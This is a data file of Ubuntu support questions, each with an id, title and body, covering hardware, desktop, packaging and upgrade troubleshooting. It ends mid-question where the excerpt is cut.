152987	hot-plugging usb 3.0 drive not working in ubuntu 12.04	i have dell e6520 laptop with latest ubuntu 12.04 . i also have the ec ( expresscard ) with the usb3.0 ports . the card is recognized by ubuntu ( i can see in in lspci ) , but when i plug in the external usb3.0 hdd into the slot nothing happens - hot-plugging the drive does not work . the same drive works as hot-plug into the usb2.0 port ( built-in ) ; it also works as usb3.0 if i plug it in before boot and boot with it plugged in . how can i sort out this hot-plugging issue with usb3.0 ? note : when firstly installing ubuntu 12.04 the hot-plugging the same usb3.0 into the same ec car did work ! it stopped working after upgrade to a new kernel .
152990	kdm login manager wallpapers	just tinkering with kdm and having some trouble with theming . i 've downloaded the beatiful zxcity theme and set it as my theme for the kdm login , problem is the wallpaper switches back during load . just to simplify that , we have 3 stages to our login . problem startup machine , goes through the motions , login screen presented with theme . kde loading screen pops up and goes through the 5 icons ( hard-drive , network , kde symbol , etc.. ) kde desktop presented question i 'm trying to get a wallpaper across all 3 of these stages . to do this i need to : set my kdm theme ( done ) ? ? ? ? set the kde wallpaper ( done ) at stage 2 the wallpaper is reverting back to the default grey stripes thing . ugly as sin . could someone tell me where that image is being called from so i can change it at stage 2 ?
152991	in setting up dual boot with windows xp and ubuntu , which os do i install first ?	i 'd like to install both ubuntu 12.04 and windows xp on a dell laptop , and i was thinking about using a dual boot structure , and using the bulk of my hard drive as empty hard drive space to share files between the two operating systems ( so choice of file system type is very important in this set-up ) . the kind of partitioning structure i would like to use is partition 1 - ubuntu 12.04 ( root ) ( 20gb ) partition 2 - ubuntu /home ( 20gb ) partition 3 : free space ( 560gb ) partition 4 : windows xp ( 35gb ) partition 5 : swap ( 3gb ) ( total hardrive capacity is ~640gb ) my question is ; what is the best way to go about setting up this kind this system ? should i install windows xp first and setup the partitions , and then install ubuntu which i believe will install the grub bootloader for os booting choice or do i install ubuntu first , setting up the available partitions and then perform a windows install ? please let me know if there is anything in this setup that i have left out and should know about , including things related to setting particular partitions as logical or primary , and whether the boot partition and the filesystem partition should actually be two separate partitions .
152993	shotwell does not copy , but import them without copying	i tryed to import photos from my external harddisk into shotwell . after doing this , i disconected the harddisk and the photos disapeared immediately . i saw that the photos had been importet into the database without being copied . copying the whole file into the picturefile is possible , but i would like to have to same fileorder in my library . not a mixed up ( organised by date ( shotwell ) and organised by filenames ( my old organisation ) . it has not been any problem copying photos from a dvd . is there any possibility to have the same filestructure for all fotos or is there a bug in shotwell ? thanks
152995	how would i batch rename a lot of files using command-line ?	i have a problem which i am unable to solve : i need to rename a great dump of files using patterns . i tried using this , but i always get an error . i have a folder , inside with a lot of files . running ls -1 | wc -l , it returns that i have like 160000 files inside . the problem is , that i wish to move these files to a windows system , but most of them have characters like : and ? in them , which makes the file unaccessible on said windows-based systems . ( as a `` do not solve but deal with '' method , i tried booting up a livecd on the windows system and moving the files using the live os . under that ubuntu , the files were readable and writable on the mounted ntfs partition , but when i booted back on windows , it showed that the file is there but windows was unable to access it in any fashion : rename , delete or open . ) i tried running rename 's/\ : /_ ' * inside the folder , but i got argument list too long error . some search revealed that it happens because i have so many files , and then i arrived here . the problem is that i do n't know how to alter the command to suit my needs , as i always end up having various errors like trying find -name '* : * ' | xargs rename : _ , it gives xargs : unmatched single quote ; by default quotes are special to xargs unless you use the -0 option [ \n ] syntax error at ( eval 1 ) line 1 , near `` : '' [ \n ] xargs : rename : exited with status 255 ; aborting adding the -0 after xargs turns the error message to xargs : argument line too long these files are archive files generated by various php scripts . the best solution would be having a chance to rename them before they are moved to windows , but if there is no way to do it , we might have a way to rename the files while they are moved to windows . i use samba and proftpd to move the files . unfortunately , graphical software are out of the question as the server containing the files is what it is , a server , with only command-line interface .
152996	qt menus disappear in unity	i have a fresh install of ubuntu 12.04 and updated the whole system last week . ( just to clarify that i 'm up to date ) when i 'm using qt applications like qtcreator , opera , dolphin and so on , their context menus start to disappear after some time . so i 'm not able to see the menus when right-clicking stuff . this can take a bunch minutes and restarting those apps sometimes fixes it ( for some time again ) . seems like last week 's update does n't allow me to fix stuff by restarting the apps anymore . does anyone experience the same bug ? ( it works normal in xfce and kde )
152997	ubuntu live on external hard drive	is it possible to partition external hard drive into 2 partition and put ubuntu live image on one of the partitions ? and how can i boot from this partition ?
152999	in a quickly app , should code go in `` myapp '' or `` myapp_lib '' ?	i 've just started looking into quickly and ubuntu desktop/gtk dev , and i 'm a bit confused by the organisation of the template that quickly provides . specifically , i 'm confused about two related points : why is the logic for a window or dialogue split between a file in the lib folder and another in the application folder ? for instance , the default template creates a window.py under the lib folder , and a myappwindow.py under the application folder . it seems that all of the default logic is in the window.py file , but the features being implemented in the tutorial ( $ quickly tutorial ) are written in myappwindow.py . the confusion for me here might stem from inexperience with gtk . in general , how should the code be split ( for none ui elements ) . for instance , code to connect to a sqlite db , code to contact web services , other ubuntu integration code eg dbus service , indicators etc . thanks for any help !
153001	glx missing , segmentation fault	i have installed all the individual components of sidsuite . next , the command that is used to start the monitoring application is called sidstart . i have placed $ home/bin directory into command search path , and now we can start up the monitoring application by simply typing sidstart at the command prompt.but i am getting an error when i type sidstart : using volk machine : sse4_2_32 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . segmentation fault
153002	how to make bootable pendrive to install ubuntu os ?	i am a newbie to all of this stuff . initially i had a os cd of ubuntu 10.4 version . i never tried to install it . now i have lost my cd somewhere . earlier i copied the content to my laptop . when i tried to install by copying to another cd/pendrive it did n't install . now i am using windows . but i would like to install ubuntu , because everyone said that linux/ubuntu is an amazing os . so i searched in google for a solution . with unetbootin , pendrive linux , i can make a bootable pendrive to install . but unetbootin asks for an iso-image . i did many experiment and wastes more than 9 cd 's . i have no experience with that . where can i get the iso-image ? actually , what is an iso-image ?
153015	how do i ignore missing trusted keys in apt sources.list ?	i have a problem in ubuntu hardy : i use an old hardy server that i may not upgrade with the historical sources : http : //de.archive.ubuntu.com hardy i want to install python2.6 from another source and tried this : http : //linuxverzion.blogspot.de/2010/12/install-python-26-on-ubuntu-804-lts.html add to /etc/apt/sources.list deb http : //ppa.launchpad.net/python-dev/ppa/ubuntu hardy main deb-srchttp : //ppa.launchpad.net/python-dev/ppa/ubuntu hardy main # import the pub key sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys d81367b9 i changed it to my key but i get the error gpg : schl端ssel d81367b9 von hkp server keyserver.ubuntu.com anfordern gpgkeys : http fetch error 7 : could n't connect to host gpg : keine g端ltigen openpgp-daten gefunden . gpg : anzahl insgesamt bearbeiteter schl端ssel : 0 is it possible to tell apt , that i dont care if the key exists ? i would like to ignore the missing key ( it is a messed up server anyway )
153016	apport-gpu-error-intel.py crash	feeling disempowered by ubuntu 's new bug reporting policy/system . my intel i5 machines have all experienced daily ( if not more frequent ) freezes , but it 's very difficult to report bugs now and policy instead is just for ubuntu to collect counts ; no way for me to see that anything is ( or is not ) being worked on . i 've just experienced a freeze and now on reboot i 'm stuck in a cycle of `` ubuntu has an internal error '' ( presumably ubuntu never experiences an external error ... ) do you want to report it ? yes . oh another internal error ... it looks like this report could contain useful information . is there anyway to make sure it gets provided to the people who can fix it ?
153023	what is the linux-image-extra package for and do i need it ?	good day everyone . i occasionally update my kernel from this web site http : //kernel.ubuntu.com/~kernel-ppa/mainline/ i have been always downloading 3 deb files for installing linux header all , linux image and linux headers . i noticed one more deb file recently for 64 bit kernel called linux-image-extra . i would like to know what does kernel file linux-image-extra do and should i also install it ?
153025	bypass optimus for external display	i have an xps 14z with intel and nvidia graphics . the intel card is connected to the laptop display only . the nvidia card is connected to the display port and hdmi port . i am running bumblebee for limited optimus support ( i.e . power-saving only ) and realise there is no seamless way to enable dual monitor output with extended desktop at this point . that said , since i spend quite a portion of my time at my desk with my laptop connected to my charger , what is the easiest way to bypass bumblebee and just enable the nvidia card and utilise my external display ( and not use the laptop display ) ? i am kind of hoping to configure my laptop in such a way that i can simply specify an xorg.conf , restart lightdm and have the external display used . then , if i remove the xorg.conf and restart lightdm , the laptop display is used . ( or a similarly quick switching method ) . i am happy to log-out and back in during the transition from external to laptop display . i did try this really-quickly by specifying a simply xorg.conf with the nvidia driver specified , but the xserver seemed to complain about not finding the nvidia module . other questions similar to this seem to relate to enabling the external display alongside the laptop display . many thanks for any help , whytey
153026	network connection problem	i am using ubuntu 11.10 lts . when i switch on my lappy , the network connections i have created works fine , but after sometime ( not always ) they disappear and no connection lefts available for use . the default wired connection also disapprears along with dsl connection i have created . i restart my pc and again start using network but the same thing happens again . sometimes network connections work smooth sometime continuously same problem gets repeated without any reason . i only browse internet on mozilla when such thing happens , no other network tool or other any other software is running when this problem occurs . so it is not triggered by other software or network tool , it happens automatically . this time i am using dsl connection for more than 1 hour and its working smoothly . before this i switched off my lappy several times and then again started up again problem occurred again switched off ... . .. . dont knw what is wrong with this ... i am using hp laptop intel core i 5 .
153027	how to get a wacom bamboo tablet working properly in an ubuntu vm on a mac ?	i 'm using parallels for mac and vmware fusion ( on a mac , obviously ) , and i 'm using ubuntu 12.04 as a guest os . the tablet i 'm using is a wacom bamboo pen & touch ( cth-460 ) and it 's my only mouse device . the touch part works reasonably ( although the cursor moves a lot quicker under the ubuntu guest os ) , but the pen part does n't work properly at all . i can hover the pen above the tablet to move the cursor ok , but if i tap the pen on the tablet the ubuntu guest os will register a click and a drag to a random position on the screen . it happens the same on both vmware fusion 4 and parallels 7 ( both with their own installation of the ubuntu ) . if i force the usb device to connect to the guest os i lose the usage of it in mac osx but then the tablet works fine under ubuntu . i ca n't decide if this is an issue with ubuntu handling the 'fake ' hid or the vm software doing something strange , but a windows guest works fine with it .
153029	tool to fire up ec2 instance and ssh in ?	it 's a fairly common thing that i want to fire up a clean ec2 instance of a particular version of ubuntu ( usually lucid or precise ) and then ssh in to that instance once it 's up . i 've got some python code that i use to do it for projects ( lp : pkgme-service , lp : lp-dev-utils ) , but i was wondering whether there 's a command-line tool . i tried ubuntu-ec2-run . it does n't use a security group that opens up ssh , so i would have to do that manually .
153031	trouble updating/installing newer required r	all other answers i find only end up pointing to instructions : http : //cran.r-project.org/bin/linux/ubuntu/ so interpreting that site , added line : deb http : //r.meteo.uni.wroc.pl/bin/linux/ubuntu oneiric universe to /etc/apt/sources.list and ran apt-get update . ( from experimentation i had to add the `` universe '' or `` main '' at the end to avoid parse error in the repositories list , preventing apt or synaptic from updating at all ) . however the problem persists : w : failed to fetch http : //r.meteo.uni.wroc.pl/bin/linux/ubuntu/dists/oneiric/main/binary-i386/packa‌​ges 404 not found i enter that url in a browser and clearly see that path is not there . however this is : http : //r.meteo.uni.wroc.pl/bin/linux/ubuntu/oneiric/ ( under which the packages file actually lies , etc . ) tried other mirrors , same problem . lsb_release -a ubuntu 11.10 the version of r available initially prevents me from installing updated packages , eg . : > install.packages ( `` performanceanalytics '' ) installing package ( s ) into ‘/usr/local/lib/r/site-library’ ( as ‘lib’ is unspecified ) warning message : in getdependencies ( pkgs , dependencies , available , lib ) : package ‘performanceanalytics’ is not available ( for r version 2.13.1 ) where i am going wrong ?
153036	how do i install only the kde desktop ( and not apps ) on unity ?	my question is pretty simple . i have ubuntu 12.04 with unity and i want to login with kde . i have seen recommendations to : 1- run the three commands : $ sudo add-apt-repository ppa : kubuntu-ppa/backports $ sudo apt-get update $ sudo apt-get install kubuntu-desktop 2- run just the command : $ sudo apt-get install kubuntu-desktop 3- run the command : $ sudo apt-get install kde-standard 4- run the command : $ sudo apt-get install kde-full 5- run the command : $ sudo apt-get install plasma-desktop 6- run the command : $ sudo apt-get install kde-plasma-desktop 7- etc ... this question is very related to this one , but the answer there is not clear enough to me . there seems to be quite a number of quasi-identical commands one could use to install the kde desktop . i just want the desktop , no kde apps since i 'll just use the ones i 'm already using in unity . of course i also want the needed repositories added so the kde desktop will be kept updated . how would i go about doing that ?
153037	commissioning never completes	sometimes a node will boot to a login prompt but the maas server says the node is still `` commissioning '' .
153040	frequency out of range - please change display mode	i just downloaded the latest version of the ubuntu live cd , and have installed it on a desktop computer ( a fujitsu scaleo p ) . once installed it seems to work perfectly , although there are some updates recommended in the update manager . my problem is that , after having installed these updates and restarted the computer , i get this message on my monitor , and no ubuntu interface is visible : frequency out of range - please change display mode i do not know how to change this when i ca n't access an interface . is there a command that will bypass trying to boot the gui and let me change the display mode via a cli ? i am brand new to ubuntu and any help on this would be much appreciated .
153043	inconsistent mouse x events for acer t231h multitouch monitor	looks like a bug ok , i believe this is a bug in the xorg evdev driver , but as ubuntu-bug for precise so kindly asked me to work this trough the support channels , i first went ant reported this here . in the meantime , i 've upgraded to quantal and reported a proper bug , but if someone from the support community should have an answer , that would n't go amiss either . ( paragraph has been edited to refer to the reported bug ) setup this is ubuntu 12.04 precise connected to an acer t231h multitouch monitor . actually i encountered this on more than one os setup , one of them done through debootstrap . packages involved : xserver-xorg-input-evdev 1:2.7.0-0ubuntu1 linux-image-*-generic 3.2.0-24.39 on one and 3.2.0-25 on the other system symptom the mouse events as x sends them to the applications are inconsitent . this can be debugged using xev . the first touch of the screen is preceeded by a motionnotify event which already has state 0x100 , i.e . left mouse button pressed . after that comes a buttonpress event , again with state 0x100 although that value should indicate the state of the buttons before the event occurred . the subsequent drag is all right , and the buttonrelease as well , but the 0x100 bit in the state value will never become zero again . even if i 've got an ordinary mouse connected as well , it will henceforth report every movement as if i were keeping the left mouse button down . the only cure that i could find was restarting the x server . together with the buttonpress and buttonrelease events , this constant bit for left mouse button amounts to an inconsistent reporting of button state . java applications e.g . will report every move as a drag due to this issue , with severe implications for focus management . this makes using differenent parts of the application almost impossible , as mouse movement will only be reported to the component where the mouse entered the application window . comparison of expected and actual behaviour expected behaviour : motionnotify with state 0x000 when dragging the ordinary mouse motionnotify with state 0x000 for move prior to touch , or no event at all buttonpress with state 0x000 when touching the screen motionnotify with state 0x100 while dragging the finger buttonrelease with state 0x100 when lifting the finger motionnotify with state 0x000 when dragging the ordinary mouse afterwards actual behaviour : motionnotify with state 0x000 when dragging the ordinary mouse before the first touch motionnotify with state 0x100 for prior to buttonpress event buttonpress with state 0x100 when touching the screen motionnotify with state 0x100 while dragging the finger buttonrelease with state 0x100 when lifting the finger motionnotify with state 0x100 when dragging the ordinary mouse afterwards
153045	xinerama with hardware acceleration at the same time	is there some way that i can have xinerama enabled and still use hardware acceleration ? i have three monitors on 2 gpus . i have enabled xinerama , but now all hardware acceleration is gone . this results in bad framerates in games , and compiz is n't working properly . in case this is impossible , is there some way to move applications between x screens without xinerama ? here is my xorg.conf , generated by nvidia x server settings : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ zirconium ) fri mar 30 13:43:34 utc 2012 section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 85.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` gml gm-quadrant-a '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' # horizsync source : edid , vertrefresh source : edid endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 ; crt : 1280x1024_75 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' # generated from default endsection section `` extensions '' option `` composite '' `` disable '' endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 570 '' busid `` pci:1:0:0 '' screen 0 option `` nologo '' `` true '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 570 '' busid `` pci:1:0:0 '' screen 1 option `` nologo '' `` true '' endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9500 gs '' busid `` pci:7:0:0 '' option `` nologo '' `` true '' endsection
153048	firefox window size and position	i am using ubuntu 12.04 with a dual monitor setup . i like firefox to have a specific position and size on my screen . so i resize it and position it like i want it . but when i close and reopen it , it randomly resizes and positions itself as it wants . is there a way to make firefox remember it 's size and position ? i have tried compizconfig settings manager but this changes the default behavior of all firefox windows , including pop up dialog boxes . i 'm hoping there is a better method . thanks
153051	copy/backup ext4 files to external ntfs hdd : permissions etc	normally i backup my files ( from ext4 drive ) to an external ext4 hdd . now i want to copy/backup some files to an external ntfs hdd , so i have the possibility to access them from windows , too . is there something i have to take care of ( permissions etc. ) ? do i just copy the files or do i need to use a special program ( rsync etc . ) or specific cp parameters ? can i use the ntfs hdd also as a backup drive and restore the files to the ext4 ?
153052	how to change v desktop and h desktop in ubuntu 2d ?	i want to change the desktops/workplaces from 2x2 to 5x1 but it is not possible using ccsm ( compizconfig ) nor myunity . i 've tried to use gconf-editor , by changing the value of the key apps > metacity > num_workspaces to 5 , but it gets 3x2 without the last ( sixth ) desktop/workplace . does any one know how to do it on unity 2d ? on ubuntu 12.04 .
153053	samsung ml-1665 can not stop printing	i cant stop printing . under printer options when i click stop button nothing happens . and when i turn printer off and back on then it keeps printing the unfinished job . is there any other way to stop printing jobs ? my printer is samsung ml-1665
153057	gmail address book in evolution does not work	i added my gmail address book to evolution , but it gives me an error every time , even when choosing `` use secure connection '' in the address book options . the error is ( i translated it on my own ) : unable to open address book . this is because you entered a wrong uri or the server is unavailable at the moment . details : can not open book : source already loaded ! sometimes , when i click the button 'reject error ' , it does load the address book but when i return to evolution after a while , it gives me the same error and sometimes i can not load the address book . this is very annoying since i have to use evolution a lot .
153058	what about ubuntu 12.04 core updates every 6 months ?	ubuntu 12.04 lts is supported for 5 years , and will get some core updates for 2 years : i guess those updates include the kernel , graphic drivers and x11 . but will these updates be optionnal , or not ? i would like to stick with my present version of the kernel and x11 , because i 'm using an amd/ati graphic card with fglrx driver , but according to this link , support for ati hd 2000/3000/4000 cards will be dropped soon . thanks !
153063	how to get rid of extra panels in gnome-classic	i know in previous versions , you could use alt+ right click and just remove them from the drop down menu . but that does n't seem to work in 12.04 . also , using gconf-editor , i read that you delete the /desktop/gnome/session/required_components_list/panel to reset it on login , but i ca n't find that key . edit : it was alt+super+right-click .
153064	user upstart job in ~/.init/ is not found	running 12.04 , i have the following upstart job in ~/.init/ : # myjob start on net-device-up stop on [ ! 12345 ] script echo `` > > hello from user script '' > > ~/tmp/upstart.log end script after rebooting my machine service myjob start # = > myjob : unrecognised service initctl does list the job , but running it without sudo throws an error : initctl start myjob # = > initctl : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.100 '' ( uid=1000 pid=13349 comm= '' initctl start thunderbird `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) i would expect to be able to start the job using service or initctl without using sudo . what have i misunderstood ? thanks
153068	inkscape wo n't open .cdr files	hello i 'm running kubuntu 12.04 and i 've installed inkscape because i need to edit a .cdr file , inkscape works like normal but the sole task i need it to do is edit said .cdr file which i understand it should be capable off by default . whenever i try to open the file though i get the following error : uniconvertor failed : the eror itself is longer but what it seems to be saying that it ca n't find this application , and i myself have n't found it in the package manager . if someone has experienced something similar or has a simple solution for editing cdr 's i 'm no artist i just need to change some names , i would be very gratefull . the full error .
153082	accidently installed grub to usb	while doing a fresh ubuntu install ( dual boot with xp using resize ) , i somehow managed to install grub to the source usb instead of to the harddrive . normal harddrive boot goes straight to xp . booting from usb leads me to grub . from there i can boot into ubuntu . pretty cool actually , but not what i had in mind . how do i install grub to hd ? how do i recover my usb ?
153085	skype hover features in ubuntu ?	my parents have a windows pc , and they have skype on it . when they are on skype they can go on the internet and have a small video hovering over their browser . i just want to know if there is a way to do this with ubuntu skype . or if someone can write a code or something to make this possible . i think a lot of people would love that function .
153088	changing textview font in pygtk	i have textview widget in glade named `` formula-view '' . i 'm trying to do this to change font : formulaview = self.builder.get_object ( `` formula-view '' ) fontdesc = pango.fontdescription ( 'ubuntu 16 ' ) formulaview.override_font ( fontdesc ) but this works with error . how to correctly change font ? i just want to change the font of a widget , but i do n't know how to do it . error looks like this : attributeerror : type object 'context ' has no attribute '__info__'
153089	enlarging windows	i ca n't seem to enlarge my application windows by dragging them up to the toolbar . and i ca n't even make them minimize to half of the screen when you drag them to the bottom right or left . it 's the same function as windows 7 . is there any way to enable this again ? i had it working on the previous version of ubuntu .
153090	is the bcm4306 wireless card ipv6 capable ?	i 've been trying to connect with ipv6 enabled networks with my broadcom wireless card under ubuntu 12.04 . the wireless card model is bcm4306 . $ lspci $ network controller : broadcom corporation bcm4306 802.11b/g wireless lan controller ( rev 03 ) $ ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) i have been unsuccesful to connect through an ipv6 address , but i can still connect to a network when assigned an ipv4 address . while searching for an answer or a solution , i know the kernel can handle dealing with ipv6 . so , what 's left to question should be the hardware handling the connection . unfortunately nothing comes up when i specifically try to search for information on bcm4306 ipv6 capabilities . i just tried using a wired connection to establish an ipv6 only connection to the network i 'm on right now , but i got the same behavior of constant disconnections . maybe it 's not the hardware ? i do n't know.. i do n't want to disable ipv6 on my machine as relevant networks i 'll be connecting to will be using it exclusively , but i 'm not sure what is wrong and which parts should i replace/fix to get this working.. could someone please point me in a fruitful direction to get ipv6 working under ubuntu 12.04 ?
153091	how do i install ubuntu inside virtualbox ?	i am trying to install ubuntu 12.04 as a testbed using virtual box . and my host os is also ubuntu 12.04 . please tell me how to install it using virtual box . the .iso is on my desktop , suggest me how to mount this .iso using terminal so virtualbox can detect this mounted .iso .
153092	ca n't find intel wireless-n 1000 after waking from sleep	i 've tried a lot of proposed solutions , most of them adding files to /etc/pm/config.d , as well as wifi stops working after waking from suspend with a broadcom 43225 and nothing has worked . hardware info : [ colleen @ colleen-hp ~ ] $ sudo lshw -c network [ sudo ] password for colleen : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 06 serial : 2c:27 : d7 : b1 : ea:67 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:4000 ( size=256 ) memory : c1404000-c1404fff memory : c1400000-c1403fff *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:0d:00.0 logical name : wlan0 version : 00 serial : 8c : a9:82:99:48:8c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-21-generic-pae firmware=39.31.5.1 build 35138 ip=192.168.0.4 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:48 memory : c5500000-c5501fff is anyone else still having this problem ? the two solutions i have n't tried are installing wicd and upgrading because i 've heard both are kind of unstable/buggy and wicd frankly scares me . pastebin of dmesg : http : //pastebin.com/ujqygzem
153095	acer aspire 5742 webcam zoomed in on websites , works fine with normal applications	when i use my webcam on websites eg : www.tinychat.com it 's really zoomed in , although when i use it on applications such as cheese , kamoso , or skype , it 's absolutely fine . i 've tried reinstalling cheese , reinstalling ubuntu all together , no luck . any help would be appreciated , it 's only since 12.04 that this has happened , my system is an acer aspire 5742 and it 's the built in webcam .
153096	glade alternative for quickly ?	is there ? i am not getting on with glade one bit . any other ones out there that are better to use ? thing i dont like about glade is when i make a mistake and i save i can not undo along with several other issues .
153100	can i use the 2.6 kernel provided with my embedded system to run 12.04 ?	in summary i am quite new to linux , but have the task of writing some software . the software has to run on a particular hardware board and the manufacturers of this board have provided a custom build of the kernel that i am guessing is non standard . i have managed to install ubuntu 8.04 onto a compact flash card on this board , and applied their kernel modifications . now when i go to install g++ using sudo apt-get install build-essential i get an error e : could n't find package build-essential i have seen this error in other questions , and i am not asking here why i get this problem but i do want to know if it would be safe for me to update my version of ubuntu to a more recent version and then apply the vendor kernel modifications . the vendor kernel is labelled by them as 2.6.30 so would it be safe to apply this on a version that has a 3.2 kernel version ? if i can not install g++ it will not be safe for me to develop an application but i simply do not know enough about the inner workings of linux to know the effects of using a newer version and applying the vendor kernel modifications .
153101	forcibly removing zramswap-enabler from my computer	zramswap-enabler has put my package manage in an `` inconsistent state . '' i tried forcibly removing it with this commend : dpkg -- remove -- force-remove-reinstreq but it seems to freeze and does n't complete operation . i tried modifying my dpkg status file as recommended here , but that did n't work either . when i tried upgrading my other files , zramswap still showed up , and stopped it from completing . are there any other ways i can force remove this file , or will i have to reinstall ubuntu ?
153103	which private keys are tested by ssh without configuration ?	i know there are several questions about ssh keys and how to configure it . but i found none to answer my question . so here it is : i have several ssh keys in my .ssh directory . for some remotes different keys . now i have neither configured in .ssh/config which key to use for which host , nor have i added them to an agent manually , what some questions here already mentioned . i just created the keys with ssh-keygen and it works . now i would like to know who is responsible for that and which keys are tried automatically ? i have something in my mind that says about five keys are automatically checked for compatibility - but i can not find where i found this information . does ssh-keygen automatically add those keys to an agent ? or does ssh search for any matching key by default ?
153112	shall i download updates from kernel 3.2. when i already installed 3.4.3 ?	i am using ubuntu 12.04 and due to the weak support of hybrid graphics in the originally distributed kernel ( i think it was 3.2 ) i updated the kernel to 3.4.3 today . but the system is still suggesting me to download some updates of kernel 3.2 when the software update application is popping up . will it harm my system if i still download those updates ?
153115	how do i change the `` system default '' keyboard ?	i 'm using xubuntu . i 've tried changing the session keyboard but it does n't work . if i go `settings → settings manager → keyboard → layout ( tab at top ) → uncheck use system defaults → delete the current keyboard / add a new one i find that when i log back on the correct keyboard is still not working .
153120	acer aspire backlight problem	i have the same problem as found on this link screen turns black after booting , backlight only works in recovery mode on an acer aspire 5736z i 've never used any linux before so if someone could tell me exactly step-by-step what to do with the answer given by `` ashutosh '' . thanks
153129	how to change drive 's name ?	i 've got two windows drives next to the ubuntu drive , they are called xxxgb filesystem , where xxx is a size ( 80 and 329 ) . how can i change their names to windows and data . i do n't care , they are called strangely in /media folder , although it would be nice to know where can i change it too and how may i disable to show a system drive , that should n't be visible at all . how it is now : how it should look like :
153130	my installed ubuntu 10.10 system is broken . can i install 12.04 over it using the wubi installer ?	i installed maverick meerkat when it came out alongside windows 7 , via the traditional installer ( not wubi ) . so everytime i restart/booted up my computer , i 'd get a purple os selection screen , to select between the ubuntu version or windows 7 . however , after i updated it to natty narwhal , the gui basically stopped working and i could n't get it to work . now when i log in i have 2 linux options ( one with a recovery mode ) , one windows 7 option , two options that say wintestx86 , and one that opens up previous versions of ubuntu ( as a a separate folder ) . my quesiton is , i really want to try ubuntu , so if i install the latest version , 12.04 , using the wubi installed , can i just overwrite the previously installed ubuntu versions ? i do n't want to overwrite the windows partition/affect my windows data in any way possible . how do i go about doing this ?
153131	how do you recover from a failed upgrade ( 'apt-get -f install ' and 'dpkg -- configure -a ' fail ) ?	during an upgrade from lucid ( 10.04 ) to precise ( 12.04 ) , the x session froze , and i have been trying to recover the upgrade to get a stable system . i have performed the following steps : used ssh to log in to the stalled system over the network . checked the contents of the /var/log/dist-upgrade directory . there was no activity on main.log , apt.log or term.log . top showed that process 'precise ' was using about 3 % cpu , but i could find no evidence that the upgrade process was still doing anything . 'dpkg ' did not show up in top , but it came up with pgrep dpkg | xargs ps killed the 'dpkg ' and 'precise ' processes tried to recover the upgrade by running sudo fuser -vki /var/lib/dpkg/lock ; sudo dpkg -- configure -a . this was partially successful ( some packages were configured ) , but failed with the message processing was halted because there were too many errors . i ran the same command a few times , and each time some packages were configured but others failed . tried running sudo apt-get -f install . it fails with similar errors to dpkg . the current situation is that dpkg -- configure -a and sudo apt-get -f install fails with two kinds of error : dependency issues , e.g . : dpkg : dependency problems prevent configuration of cifs-utils : cifs-utils depends on samba-common ; however : package samba-common is not configured yet . dpkg : error processing cifs-utils ( -- configure ) : dependency problems - leaving unconfigured resource conflict , e.g . : debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable additionally , it seems there 's reference to potential boot problems , so i 'm not keen to reboot without fixing the install first : dpkg : too many errors , stopping processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-25-generic cryptsetup : warning : failed to detect canonical device of /dev/sda1 cryptsetup : warning : could not determine root device from /etc/fstab so my question is , how to 